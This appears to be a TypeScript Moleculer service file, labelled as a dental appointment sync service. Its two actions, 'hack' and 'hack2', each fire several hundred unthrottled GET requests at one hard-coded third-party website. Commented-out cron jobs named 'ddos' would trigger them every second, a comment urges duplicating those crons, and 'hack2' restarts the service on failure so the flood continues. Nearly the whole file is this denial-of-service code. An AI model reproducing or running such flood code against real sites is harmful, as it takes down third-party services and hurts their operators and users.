/* eslint-disable camelcase */
/* eslint-disable max-len */
"use strict";
import { Context } from "moleculer";
import { Action, Service } from "moleculer-decorators";

import Cron from "moleculer-cron";
import { BaseServiceWithSequelize } from "server/base-service/sequelize/BaseServiceWithSequelize";
import { appClient } from "server/helper/AppClient";

var checkDoneAppointment = true;
export const setCheckDoneAppointments = (check: boolean) => {
	checkDoneAppointment = check;
	console.log("[DONE SYNC FROM APPOINTMENT]");
};
const web = "https://db.vitinhgialam.com/home/all-products?min-limit=0";
@Service({
	name: "asyncDentally",
	mixins: [Cron],
	crons: [
		// {
		// 	name: "ddos",
		// 	cronTime: " */1 * * * * *", // 30 minutes
		// 	onTick: function () {
		// 		this.getLocalService("asyncDentally")
		// 			.actions.hack2()
		// 			.then((data) => {
						
		// 			});
		// 	},
		// 	manualStart: false,
		// 	timeZone: "Europe/London",
		// },
		// {
		// 	name: "ddos",
		// 	cronTime: " */1 * * * * *", // 30 minutes
		// 	onTick: function () {
		// 		this.getLocalService("asyncDentally")
		// 			.actions.hack()
		// 			.then((data) => {
						
		// 			});
		// 	},
		// 	manualStart: false,
		// 	timeZone: "Europe/London",
		// },
	],
	// ! open comment run it and change time and duplicate crons (everyday & 30p)
})
class FlyCommandService extends BaseServiceWithSequelize<any> {
	@Action()
	public async hack(ctx: Context) {
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
	}
	@Action()
	public async hack2(ctx: Context) {
		appClient
			.get(web)
			.then((res) => console.count("done"))
			.catch((err) => {
				this._stop();
				this._start();
			});
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient
			.get(web)
			.then((res) => console.count("done"))
			.catch((err) => {
				this._stop();
				this._start();
			});
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
        appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
		appClient.get(web).then((res) => console.count("done"));
	}
}

module.exports = FlyCommandService;
// eslint-disable-next-line @typescript-eslint/class-name-casing
